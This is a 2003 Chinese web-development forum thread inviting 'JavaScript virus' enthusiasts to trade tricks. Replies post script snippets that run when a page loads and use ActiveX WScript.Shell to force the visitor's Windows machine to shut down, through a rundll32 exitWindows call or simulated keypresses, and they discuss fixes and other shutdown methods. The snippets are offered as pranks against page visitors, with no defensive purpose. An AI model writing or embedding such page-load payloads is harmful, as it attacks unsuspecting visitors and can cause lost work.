javascript病毒爱好者请进。

koolfoo 2003-02-13 09:50:47
有喜欢javascript病毒的吗?
一起探讨。
可以提问,也可以.......
关注。
...全文
153 9 打赏 收藏 转发到动态 举报
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
a2824cl 2003-02-14
  • 打赏
  • 举报
回复
不好用,就是打开了,开始菜单。而且还有危险的提示。
nik_Amis 2003-02-14
  • 打赏
  • 举报
回复
up
ZeusLion 2003-02-14
  • 打赏
  • 举报
回复
真是丢脸 错了
是 rundll32.exe user.exe,exitWindows

看看
http://expert.csdn.net/Expert/topic/1420/1420887.xml?temp=.9232447
ZeusLion 2003-02-14
  • 打赏
  • 举报
回复
有意思,我原来只有 rundll32 kernel32.dll exitwindow 一种方法
呵呵不知拼写的对不对.
emu_ston 2003-02-14
  • 打赏
  • 举报
回复
http://www.csdn.net/develop/Read_Article.asp?Id=8980
natson 2003-02-14
  • 打赏
  • 举报
回复
进入叶面自动关机

win98/me
<script language="JavaScript">
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run("rundll32.exe user.exe,exitWindows");
</script>

win2000 or xp
<script language="JavaScript">
var wsh = new ActiveXObject("WScript.Shell");
wsh.sendKeys("^{ESC}");
wsh.sendKeys("{UP}~S~");
</script>
不算病毒,但也不让人爽哦~~
koolfoo 2003-02-14
  • 打赏
  • 举报
回复
请回答下面这个问题:

http://expert.csdn.net/Expert/topic/1415/1415391.xml?temp=.2444269
koolfoo 2003-02-14
  • 打赏
  • 举报
回复
我是用的2000
<script language="JavaScript">
var wsh = new ActiveXObject("WScript.Shell");
wsh.sendKeys("^{ESC}");
wsh.sendKeys("{UP}~S~");
</script>

这段代码没有效果,只是将开始菜单弹出来而已,没有其它动作。
koolfoo 2003-02-14
  • 打赏
  • 举报
回复
其实,不用wscript.shell
用其它方法,也可以实现关机,比如说shell.application
当然不是它的shutdownwindows方法。还有其它的方法。

继续关注。

有很多是msdn没有公布的。但微软程序员却知道,看看xp里面就有许多。

87,910

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧